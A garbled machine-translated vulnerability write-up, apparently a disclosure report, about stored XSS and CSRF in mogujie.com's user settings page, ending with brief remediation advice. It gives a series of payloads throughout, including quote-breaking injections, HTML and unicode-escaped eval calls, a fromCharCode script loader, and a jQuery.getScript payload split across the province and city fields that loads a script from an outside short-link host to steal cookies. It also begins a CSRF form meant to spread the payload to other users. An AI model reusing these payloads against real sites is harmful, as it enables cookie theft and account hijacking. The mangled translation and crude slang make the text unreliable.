Mogujie.com CSRF + stores XSS and loads arbitrary scripts to obtain sister cookies

Mogujie.com configures user information and does not strictly filter user submissions.

This problem was discovered long ago last year. It was not reported to anyone who did not know mogujie.com. wooyun submitted it last year. So it has been put on hold. Recently, the mouse broke down and it was inconvenient to do things. I put my notes in the hard drive, so I submitted the mixed luck again. Access webpage http://www.mogujie.com/settings/personal Change the page to modify the user configuration information, and check that almost all the code is output in the html Tag. However, you can find that the user's location is output in the JS statement. Through a manual test, we found that no single quotation marks were filtered. At this time, we found that there was a header, and no single quotation marks were filtered. That means we can close the JS statement here. I am in a good mood, so I submitted the identity field: '); eval (alert (123); I am going to let me wait for me to explore the sister-in-law paper, I was surprised to find that there was no bullet box. Take a look at the code. I blocked all the necessary keywords for the play girl, but I was so angry and anxious. No, the pop-up window is so fun. You can't give up. There is a silver bullet. On the webpage, the HTML resolution priority is higher than the JS resolution priority. We can encode sensitive words in HTML and submit them again. Hey hey, you are so lascivious, so you are dirty, and you are dirty, brother must blow your chrysanthemum. Submitted province field data: % 27% 29% 3B % 26% 3 Bval % 28a % 23101% 26% 3 Bert % 23108% 28123% 29% 29% 3B ('); & #101; val (a & #108; ert (123); URL encoding. Why is it encoded? Because there is a & Symbol in it.) JJ is not played. Check the source code. Let me go, v5 programmers, you are swollen, You do not Filter Single quotes, you filter # What do you do, # has revenge on you. Unicode HTML encoding. We also have dear unicode encoding. How can we use TJJ today, '); eval (alert (123); encode the two sensitive words into:'); \ u0065val (\ u0061lert (123 )); after submitting the file, you can play JJ. Cool, let's get the cookie and load an external JS. Submit code '); \ u0065val ('window. s = docum \ u0065nt. creat \ u0065Element (String. fromCharCode (115,99, 114,105,112,116); window. s. src = String. fromCharCode (104,116,116,112, 47,120,115,115, 46,109,101, 50, 50); docum \ u0065nt. body. app \ u0065ndChild (window. s) ') Check the source code again. I went there, got truncated, and got truncated. It was so hard. No way. It is worth streamlining playlaod. The submitted province data is: 123456789012345678901234567890123456789012345678901234567890, N multiple, And you can view how much code can be entered. Enter 30 characters, and then enter 30 characters in the city. A total of 60 characters, excluding the comments/**/4 characters, and loading the closed characters ', and'); 5 characters, that is, 50 characters can be used. Unicode characters are not enough. It seems that other methods are still used. Continue to work hard to manually fuzzing and check what he filtered out: After a painstaking test, he found that "> & the conversion intention of html encoding is used, and the characters smaller than the number and later are filtered out, the string asa <123213 is filtered into asa. Common JS statements such as eval alert document are repeatedly filtered out. evaleval is filtered out to be null, but \ eval is not filtered out. If a filter rule is not found at the front end, it indicates that the filtered regular expression is placed behind it and the blacklist is used. As a result, the missing function is not filtered. I checked the page and found it very beautiful. I found jquery in the head. It was so nice. I wish you a good luck. Submit: province = */'// 126.am/ dTPsg2'); // & city = ', ''); jQuery. getScript (/* jQuery. getScript can be abbreviated to $. use/**/to comment out the single quotation marks between the getScript province and the city. After submission, it is completed successfully. Open in the browser and obtain sensitive information. Up to now, you can only play yourself, not your sister. Many manufacturers do not care about such a vulnerability and think it is very harmful. Then let's turn the poor silk into the rich handsome. Change the pages that can only be played by yourself to all the pop-up paper. During the test, we found that you can directly modify the configuration when modifying the configuration. The CSRF vulnerability exists when you buy a cake. Haha, it seems that Gao fushuai is just around the corner. The following table is constructed based on the data structure to be submitted. <! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Transitional // EN "" http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd "> <Html xmlns =" http://www.w3.org/1999/xhtml "> <Head> <title> No title page </title> <script type =" text/javascript "> function send () {var f = document. getElementById ("reg"); f. submit () ;}</script>

In other words, mogujie.com posted a non-trust external chain prompt, which was originally prepared to test whether it could be bypassed. I know that my sisters are very dedicated. I sent several link accounts and was blocked. I registered several emails and finally gave up. If you are interested, you can test them.Solution:

1. Add token to prevent CSRF. Referrer is too unreliable for verification. 2. I cannot figure out the province. Why do users submit the region. Since the user submits, the filtering is strict. The special characters (except letters and numbers) output in the javascript tag are encoded in 0xHH format. There should be no way to bypass this.